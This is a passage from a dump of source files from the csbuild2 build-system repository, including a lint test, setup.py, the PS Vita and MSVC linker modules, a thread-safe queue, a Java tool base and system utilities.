pkg in relintMemo:\n\t\t\t\t\t\t\tshouldRelint = relintMemo[pkg]\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tshouldRelint = _shouldRelint(pkg)\n\t\t\t\t\t\t\trelintMemo[pkg] = shouldRelint\n\n\t\t\t\t\t\tif shouldRelint:\n\t\t\t\t\t\t\treturn True\n\t\t\treturn False\n\n\t\trepoRootPath = os.getcwd()\n\t\tfor root, _, files in os.walk(repoRootPath):\n\t\t\troot = os.path.relpath(root, repoRootPath)\n\n\t\t\t# Discard directories that begin with '.'\n\t\t\tif len(root) > 1 and root.startswith(\".\"):\n\t\t\t\tcontinue\n\n\t\t\tfor filename in files:\n\t\t\t\t# Discard files that begin with '.'\n\t\t\t\tif filename.startswith(\".\"):\n\t\t\t\t\tcontinue\n\n\t\t\t\tif filename.endswith(\".py\"):\n\t\t\t\t\tfinalfile = os.path.normpath(os.path.join(root, filename))\n\n\t\t\t\t\tif _shouldRelint(finalfile):\n\t\t\t\t\t\t_sharedLocals.count += 1\n\t\t\t\t\t\tpool.AddTask((_runPylint, finalfile), _checkDone)\n\n\t\tif _sharedLocals.count == 0:\n\t\t\treturn\n\n\t\tfailedLints = set()\n\t\tpool.Start()\n\t\terrors = False\n\n\t\twhile True:\n\t\t\tcb = callbackQueue.GetBlocking()\n\n\t\t\tif cb is thread_pool.ThreadPool.exitEvent:\n\t\t\t\tbreak\n\t\t\ttoReraise = None\n\t\t\ttry:\n\t\t\t\tcb()\n\t\t\texcept thread_pool.ThreadedTaskException as e:\n\t\t\t\ttoReraise = e\n\n\t\t\tif toReraise:\n\t\t\t\ttry:\n\t\t\t\t\ttoReraise.Reraise()\n\t\t\t\texcept 
AssertionError:\n\t\t\t\t\tpass\n\t\t\t\texcept:\n\t\t\t\t\tlog.Error(traceback.format_exc())\n\t\t\t\t\terrors = True\n\n\t\tlog.SetCallbackQueue(None)\n\n\t\twith open(\"failedLints.txt\", \"w\") as f:\n\t\t\tf.write(\"\\n\".join(failedLints))\n\n\t\tif failedLints:\n\t\t\tlog.Error(\"The following modules failed to lint:\")\n\t\t\tfor module in failedLints:\n\t\t\t\tlog.Error(\" {}\", module)\n\t\t\tself.fail(\"{} files failed to lint: {}\".format(len(failedLints), failedLints))\n\n\t\tif errors:\n\t\t\tself.fail(\"Exceptions were thrown during the test\")\n" }, { "alpha_fraction": 0.7122986912727356, "alphanum_fraction": 0.7196193337440491, "avg_line_length": 37.47887420654297, "blob_id": "9500382a436b8c3658dbad2d9e809ce1cf56ed13", "content_id": "2a4a10048513f71eafdb86291c488760f84e1154", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2732, "license_type": "no_license", "max_line_length": 195, "num_lines": 71, "path": "/setup.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: setup\n\t:synopsis: Setup script for csbuild.\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nfrom setuptools import setup\n\nwith open(\"csbuild/version\", \"r\") as f:\n\tcsbuildVersion = f.read().strip()\n\nsetup(\n\tname = \"csbuild\",\n\tversion = csbuildVersion,\n\tpackages = [\"csbuild\"],\n\tinclude_package_data = True,\n\tauthor = \"Sleeping Cat, LLC\",\n\tauthor_email = \"[email protected]\",\n\turl = \"https://github.com/SleepingCatGames/csbuild2\",\n\tdescription = \"Programming language-agnostic build system\",\n\tlong_description = \"\"\"CSBuild is a language-agnostic build system focused on maximizing developer iteration time and providing tools for enabling developers to improve their build workflow. 
\"\"\",\n\tclassifiers = [\n\t\t\"Development Status :: 2 - Pre-Alpha\",\n\t\t\"Environment :: Console\",\n\t\t\"Intended Audience :: Developers\",\n\t\t\"License :: OSI Approved :: MIT License\",\n\t\t\"Natural Language :: English\",\n\t\t\"Operating System :: Microsoft :: Windows\",\n\t\t\"Operating System :: MacOS :: MacOS X\",\n\t\t\"Operating System :: POSIX :: Linux\",\n\t\t\"Programming Language :: Assembly\",\n\t\t\"Programming Language :: C\",\n\t\t\"Programming Language :: C++\",\n\t\t\"Programming Language :: Java\",\n\t\t\"Programming Language :: Objective C\",\n\t\t\"Programming Language :: Python :: 2.7\",\n\t\t\"Programming Language :: Python :: 3.4\",\n\t\t\"Programming Language :: Python :: 3.5\",\n\t\t\"Programming Language :: Python :: 3.6\",\n\t\t\"Programming Language :: Python :: 3.7\",\n\t\t\"Programming Language :: Python :: 3.8\",\n\t\t\"Programming Language :: Python :: 3.9\",\n\t\t\"Topic :: Software Development :: Build Tools\",\n\t],\n\tinstall_requires = [\n\t\t\"graphviz\",\n\t],\n)\n" }, { "alpha_fraction": 0.6735913753509521, "alphanum_fraction": 0.6747870445251465, "avg_line_length": 33.13775634765625, "blob_id": "cb133029e8e63b74ecd70726cab4f322cf806fca", "content_id": "3b6637c8a7b4e7616231f1aa4de41f3122c7b639", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6691, "license_type": "no_license", "max_line_length": 117, "num_lines": 196, "path": "/csbuild/tools/linkers/psvita_linker.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: psvita_linker\n\t:synopsis: Implementation of the PSVita linker tool.\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport csbuild\nimport os\n\nfrom .linker_base import LinkerBase\n\nfrom ..common import FindLibraries\nfrom ..common.sony_tool_base import PsVitaBaseTool\n\nfrom ... 
import log\nfrom ..._utils import response_file, shared_globals\n\nclass PsVitaLinker(PsVitaBaseTool, LinkerBase):\n\t\"\"\"\n\tPSVita linker tool implementation.\n\t\"\"\"\n\tsupportedArchitectures = { \"arm\" }\n\n\tinputGroups = { \".o\" }\n\toutputFiles = { \".self\", \".a\", \".suprx\" }\n\tcrossProjectDependencies = { \".a\", \".suprx\" }\n\n\tdef __init__(self, projectSettings):\n\t\tPsVitaBaseTool.__init__(self, projectSettings)\n\t\tLinkerBase.__init__(self, projectSettings)\n\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef SetupForProject(self, project):\n\t\tPsVitaBaseTool.SetupForProject(self, project)\n\t\tLinkerBase.SetupForProject(self, project)\n\n\tdef _getOutputFiles(self, project):\n\t\tprojectOutputName = project.outputName\n\n\t\t# PSVita requires that libraries begin with the \"lib\" prefix.\n\t\tif project.projectType == csbuild.ProjectType.SharedLibrary and not projectOutputName.startswith(\"lib\"):\n\t\t\tprojectOutputName = \"lib{}\".format(projectOutputName)\n\n\t\toutputFilename = \"{}{}\".format(projectOutputName, self._getOutputExtension(project.projectType))\n\t\toutputFullPath = os.path.join(project.outputDir, outputFilename)\n\t\toutputFiles = [outputFullPath]\n\n\t\t# For shared libraries, the linker will automatically generate a stub library that can be linked against.\n\t\t# Note the stub will only be generated if something in the project is being exported. But, since dynamic\n\t\t# loading at runtime isn't possible, such a project would be pointless, so we can assume the developer will\n\t\t# always export something.\n\t\tif project.projectType == csbuild.ProjectType.SharedLibrary:\n\t\t\toutputFiles.extend([\n\t\t\t\tos.path.join(project.outputDir, \"{}_stub.a\".format(projectOutputName)),\n\t\t\t])\n\n\t\treturn tuple(outputFiles)\n\n\tdef _getCommand(self, project, inputFiles):\n\t\tif project.projectType == csbuild.ProjectType.StaticLibrary:\n\t\t\tuseResponseFile = False\n\t\t\tcmdExe = self._getArchiverName()\n\t\t\tcmd = [\"rcs\"] \\\n\t\t\t\t+ self._getCustomLinkerArgs() \\\n\t\t\t\t+ self._getOutputFileArgs(project) \\\n\t\t\t\t+ self._getInputFileArgs(inputFiles)\n\t\telse:\n\t\t\tuseResponseFile = True\n\t\t\tcmdExe = self._getLinkerName()\n\t\t\tcmd = self._getDefaultArgs(project) \\\n\t\t\t\t+ self._getCustomLinkerArgs() \\\n\t\t\t\t+ self._getOutputFileArgs(project) \\\n\t\t\t\t+ self._getInputFileArgs(inputFiles) \\\n\t\t\t\t+ self._getLibraryPathArgs() \\\n\t\t\t\t+ self._getStartGroupArgs() \\\n\t\t\t\t+ self._getLibraryArgs() \\\n\t\t\t\t+ self._getEndGroupArgs()\n\n\t\tif useResponseFile:\n\t\t\tresponseFile = response_file.ResponseFile(project, \"linker-{}\".format(project.outputName), cmd)\n\n\t\t\tif shared_globals.showCommands:\n\t\t\t\tlog.Command(\"ResponseFile: {}\\n\\t{}\".format(responseFile.filePath, responseFile.AsString()))\n\n\t\t\tcmd = [cmdExe, \"@{}\".format(responseFile.filePath)]\n\n\t\telse:\n\t\t\tcmd = [cmdExe] + cmd\n\n\t\treturn cmd\n\n\tdef _findLibraries(self, project, libs):\n\t\ttargetLibPath = os.path.join(self._psVitaSdkPath, \"target\", \"lib\")\n\t\tallLibraryDirectories = list(self._libraryDirectories) + [targetLibPath]\n\n\t\treturn FindLibraries(libs, allLibraryDirectories, [\".suprx\", \".a\"])\n\n\tdef _getOutputExtension(self, projectType):\n\t\toutputExt 
= {\n\t\t\tcsbuild.ProjectType.Application: \".self\",\n\t\t\tcsbuild.ProjectType.SharedLibrary: \".suprx\",\n\t\t\tcsbuild.ProjectType.StaticLibrary: \".a\",\n\t\t}.get(projectType, None)\n\n\t\treturn outputExt\n\n\n\t####################################################################################################################\n\t### Internal methods\n\t####################################################################################################################\n\n\tdef _getLinkerName(self):\n\t\tbinPath = os.path.join(self._psVitaSdkPath, \"host_tools\", \"build\", \"bin\")\n\t\texeName = \"psp2ld.exe\"\n\n\t\treturn os.path.join(binPath, exeName)\n\n\tdef _getArchiverName(self):\n\t\tbinPath = os.path.join(self._psVitaSdkPath, \"host_tools\", \"build\", \"bin\")\n\t\texeName = \"psp2snarl.exe\"\n\n\t\treturn os.path.join(binPath, exeName)\n\n\tdef _getDefaultArgs(self, project):\n\t\targs = []\n\t\tif project.projectType == csbuild.ProjectType.SharedLibrary:\n\t\t\targs.extend([\n\t\t\t\t\"-oformat=prx\",\n\t\t\t\t\"-prx-stub-output-dir={}\".format(project.outputDir),\n\t\t\t])\n\t\treturn args\n\n\tdef _getCustomLinkerArgs(self):\n\t\treturn self._linkerFlags\n\n\tdef _getOutputFileArgs(self, project):\n\t\toutFile = \"{}\".format(self._getOutputFiles(project)[0])\n\t\tif project.projectType == csbuild.ProjectType.StaticLibrary:\n\t\t\treturn [outFile]\n\t\treturn [\"-o\", outFile]\n\n\tdef _getInputFileArgs(self, inputFiles):\n\t\treturn [f.filename for f in inputFiles]\n\n\tdef _getLibraryPathArgs(self):\n\t\targs = [\"-L{}\".format(os.path.dirname(lib)) for lib in self._actualLibraryLocations.values()]\n\t\treturn args\n\n\tdef _getLibraryArgs(self):\n\t\tlibNames = [os.path.basename(lib) for lib in self._actualLibraryLocations.values()]\n\t\targs = []\n\n\t\tfor lib in libNames:\n\t\t\tlibName, libExt = os.path.splitext(lib)\n\t\t\tif libName.startswith(\"lib\"):\n\t\t\t\tlibName = libName[3:]\n\n\t\t\tif libExt == \".suprx\":\n\t\t\t\tlibName = \"{}_stub\".format(libName)\n\n\t\t\targs.append(\"-l{}\".format(libName))\n\n\t\treturn args\n\n\tdef _getStartGroupArgs(self):\n\t\treturn [\"--start-group\"]\n\n\tdef _getEndGroupArgs(self):\n\t\treturn [\"--end-group\"]\n" }, { "alpha_fraction": 0.7649694681167603, "alphanum_fraction": 0.7670060992240906, "avg_line_length": 38.59677505493164, "blob_id": "8db3962b039af81acc533cb8b1e1015992ca783d", "content_id": "dec29ba4c88c4242ba2d0f677416d30dd9155f94", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2455, "license_type": "no_license", "max_line_length": 79, "num_lines": 62, "path": "/functional_tests/basic_cpp_test/make.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. 
Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: make\n\t:synopsis: Makefile for this test\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport csbuild\n\ncsbuild.SetOutputDirectory(\"out\")\ncsbuild.SetDefaultTarget(\"static\")\n\nwith csbuild.Target(\"static\"):\n\tcsbuild.SetOutputDirectory(\"static\")\n\nwith csbuild.Target(\"shared\"):\n\tcsbuild.SetOutputDirectory(\"shared\")\n\nwith csbuild.Project(\"libhello\", \"libhello\"):\n\twith csbuild.Target(\"shared\"):\n\t\tcsbuild.SetOutput(\"libhello\", csbuild.ProjectType.SharedLibrary)\n\n\twith csbuild.Target(\"static\"):\n\t\tcsbuild.SetOutput(\"libhello\", csbuild.ProjectType.StaticLibrary)\n\nwith csbuild.Project(\"hello_world\", \"hello_world\", [\"libhello\"]):\n\tcsbuild.Platform(\"Darwin\").AddLibraries(\"libgmalloc.dylib\")\n\tcsbuild.Platform(\"Linux\").AddLibraries(\"pthread\", \"libm.so\", \"libc.so.6\")\n\tcsbuild.Platform(\"Windows\").AddLibraries(\"winmm\", \"DbgHelp.lib\")\n\tcsbuild.SetOutput(\"hello_world\", csbuild.ProjectType.Application)\n\nwith csbuild.Project(\"fail_libraries\", \"hello_world\"):\n\tcsbuild.AddLibraries(\"nonexistent\", \"nothere\")\n\tcsbuild.SetOutput(\"hello_world\", csbuild.ProjectType.Application)\n\nwith csbuild.Project(\"fail_compile\", \"fail_compile\"):\n\tcsbuild.SetOutput(\"fail_compile\", csbuild.ProjectType.Application)\n\nwith csbuild.Project(\"fail_link\", \"fail_link\"):\n\tcsbuild.SetOutput(\"fail_link\", csbuild.ProjectType.Application)\n" }, { "alpha_fraction": 0.6785714030265808, "alphanum_fraction": 0.6785714030265808, "avg_line_length": 13, "blob_id": "0829715f0b243b702682fc3791c76fe2965cab63", "content_id": "38bd56bd267525a9cc5dee74d6896bd1caedfc12", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 28, "license_type": "no_license", "max_line_length": 14, "num_lines": 2, "path": "/functional_tests/cpp_recursive_header_test/hello_world/b.h", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "#pragma once\n#include \"a.h\"\n" }, { "alpha_fraction": 0.7286719679832458, "alphanum_fraction": 0.7308707237243652, "avg_line_length": 31.95652198791504, "blob_id": "031a9587b52ab63b8cfd22d6bcf85bb2f8181d64", "content_id": "ca4857fa33deba905e278a3f9c3550a3efb4829b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2274, "license_type": 
"no_license", "max_line_length": 114, "num_lines": 69, "path": "/csbuild/_utils/queue.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: queue\n\t:synopsis: Lock-free queue\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport threading\nfrom collections import deque\n\nclass Queue(object):\n\t\"\"\"\n\tSpecialized version of queue.Queue tailored to a smaller feature set to reduce unnecessary locking and contention\n\t\"\"\"\n\tdef __init__(self):\n\t\tself._deque = deque()\n\t\t# Semaphore used as an event to prevent Put() from having to take a lock to wake a thread in GetBlocking().\n\t\tself._sema = threading.Semaphore(0)\n\n\tdef Put(self, item):\n\t\t\"\"\"\n\t\tPut an item into the queue\n\t\t:param item: whatever\n\t\t:type item: any\n\t\t\"\"\"\n\t\tself._deque.append(item)\n\t\tself._sema.release()\n\n\tdef Get(self):\n\t\t\"\"\"\n\t\tGet an item out of the queue\n\t\t:raises IndexError: If nothing is in the queue\n\t\t:return: Whatever was put into the queue\n\t\t:rtype: any\n\t\t\"\"\"\n\t\tif not self._sema.acquire(False):\n\t\t\traise IndexError(\"Get() on an empty queue\")\n\t\treturn self._deque.popleft()\n\n\tdef GetBlocking(self):\n\t\t\"\"\"\n\t\tGet an item out of the queue, blocking if there is nothing to get.\n\t\t:return: Whatever was put into the queue\n\t\t:rtype: any\n\t\t\"\"\"\n\t\tself._sema.acquire()\n\t\treturn self._deque.popleft()\n" }, { "alpha_fraction": 0.6549317836761475, "alphanum_fraction": 0.6562004685401917, "avg_line_length": 36.0941162109375, "blob_id": "88e21f846e5033638da0e893fe9f45919d861b7d", "content_id": "7cd24715a8019e5f72d836131669b823126bd004", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3153, "license_type": "no_license", "max_line_length": 117, "num_lines": 85, "path": "/csbuild/tools/common/java_tool_base.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. 
Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: java_tool_base\n\t:synopsis: Abstract base class for Java tools.\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport csbuild\nimport os\n\nfrom abc import ABCMeta\n\nfrom ..._utils.decorators import MetaClass\nfrom ...toolchain import Tool\n\n\n@MetaClass(ABCMeta)\nclass JavaToolBase(Tool):\n\t\"\"\"\n\tParent class for all tools targeting Java applications.\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\tdef __init__(self, projectSettings):\n\t\tTool.__init__(self, projectSettings)\n\n\t\tself._javaBinPath = projectSettings.get(\"javaBinPath\", \"\")\n\n\t\t# The intermediate directory apparently doesn't exist on the project by this point,\n\t\t# so we'll keep the root directory name underneath it, then form the full path to\n\t\t# it when we build.\n\t\tself._javaClassRootDirName = \"java_class_root\"\n\n\t\t# When no Java binary path is explicitly provided, attempt to get it from the environment.\n\t\tif not self._javaBinPath and \"JAVA_HOME\" in os.environ:\n\t\t\tself._javaBinPath = os.path.join(os.environ[\"JAVA_HOME\"], \"bin\")\n\n\t\tif self._javaBinPath:\n\t\t\tassert os.access(self._javaBinPath, os.F_OK), \"Java binary path does not exist: {}\".format(self._javaBinPath)\n\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef SetupForProject(self, project):\n\t\tTool.SetupForProject(self, project)\n\n\n\t################################################################################\n\t### Static makefile methods\n\t################################################################################\n\n\t@staticmethod\n\tdef SetJavaBinaryPath(path):\n\t\t\"\"\"\n\t\tSets the path to the Java binaries.\n\n\t\t:param path: Java binary path.\n\t\t:type path: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"javaBinPath\", os.path.abspath(path))\n" }, { "alpha_fraction": 0.7418426275253296, "alphanum_fraction": 0.7434421181678772, "avg_line_length": 30.57575798034668, "blob_id": "086641fe6dd608f52dca5b1263b0a79f5c70dc1a", "content_id": "183deb41b781936f5cf5b50c68217e4b6ce695f3", 
"detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3126, "license_type": "no_license", "max_line_length": 97, "num_lines": 99, "path": "/csbuild/_utils/system.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: system\n\t:synopsis: functions with functionality analogous to the sys module, but specialized for csbuild\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport functools\nimport imp\nimport os\nimport platform\nimport traceback\n\nfrom . import shared_globals\nfrom .. import commands, perf_timer, log\n\nif platform.system() == \"Windows\":\n\tdef SyncDir(_):\n\t\t\"\"\"\n\t\tSynchronize a directory to ensure its contents are visible to other applications.\n\t\tDoes nothing on Windows.\n\t\t:param _: Directory name\n\t\t:type _: str\n\t\t\"\"\"\n\t\tpass\nelse:\n\tdef SyncDir(dirname):\n\t\t\"\"\"\n\t\tSynchronize a directory to ensure its contents are visible to other applications.\n\t\tDoes nothing on Windows.\n\t\t:param dirname: Directory name\n\t\t:type dirname: str\n\t\t\"\"\"\n\t\tdirfd = os.open(dirname, os.O_DIRECTORY) # pylint: disable=no-member\n\t\tos.fsync(dirfd)\n\t\tos.close(dirfd)\n\ndef CleanUp():\n\t\"\"\"\n\tClean up the various plates we're spinning so they don't crash to the ground or spin forever\n\t\"\"\"\n\ttry:\n\t\twith perf_timer.PerfTimer(\"Cleanup\"):\n\n\t\t\tif shared_globals.commandOutputThread is not None:\n\t\t\t\tcommands.queueOfLogQueues.Put(commands.stopEvent)\n\t\t\t\tshared_globals.commandOutputThread.join()\n\n\t\tif shared_globals.runPerfReport:\n\t\t\tif shared_globals.runPerfReport != perf_timer.ReportMode.HTML:\n\t\t\t\toutput = functools.partial(log.Custom, log.Color.WHITE, \"PERF\")\n\t\t\telse:\n\t\t\t\toutput = None\n\t\t\tperf_timer.PerfTimer.PrintPerfReport(shared_globals.runPerfReport, output=output)\n\n\t\tlog.StopLogThread()\n\texcept:\n\t\ttraceback.print_exc()\n\tfinally:\n\t\tif not imp.lock_held():\n\t\t\timp.acquire_lock()\n\n\t# TODO: Kill running subprocesses\n\t# TODO: Exit events for plugins and toolchains\n\ndef Exit(code = 0):\n\t\"\"\"\n\tExit the build process early\n\n\t:param code: Exit code to exit with\n\t:type code: int\n\t\"\"\"\n\tCleanUp()\n\t# Die hard, we don't need python to clean up and we want to make sure this exits.\n\t# sys.exit 
just throws an exception that can be caught. No catching allowed.\n\t# pylint: disable=protected-access\n\tos._exit(code)\n" }, { "alpha_fraction": 0.6815410852432251, "alphanum_fraction": 0.6854425668716431, "avg_line_length": 34.506492614746094, "blob_id": "ba5e2f60e1e99d28dcd6d72e31c079cc5a3dd4e4", "content_id": "3e5d0356e1b0d69a2466294f986dd99a38f90b72", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8202, "license_type": "no_license", "max_line_length": 135, "num_lines": 231, "path": "/csbuild/tools/linkers/msvc_linker.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: msvc_linker\n\t:synopsis: msvc linker tool for C++, d, asm, etc\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport os\nimport csbuild\n\nfrom .linker_base import LinkerBase\nfrom ..common import FindLibraries\nfrom 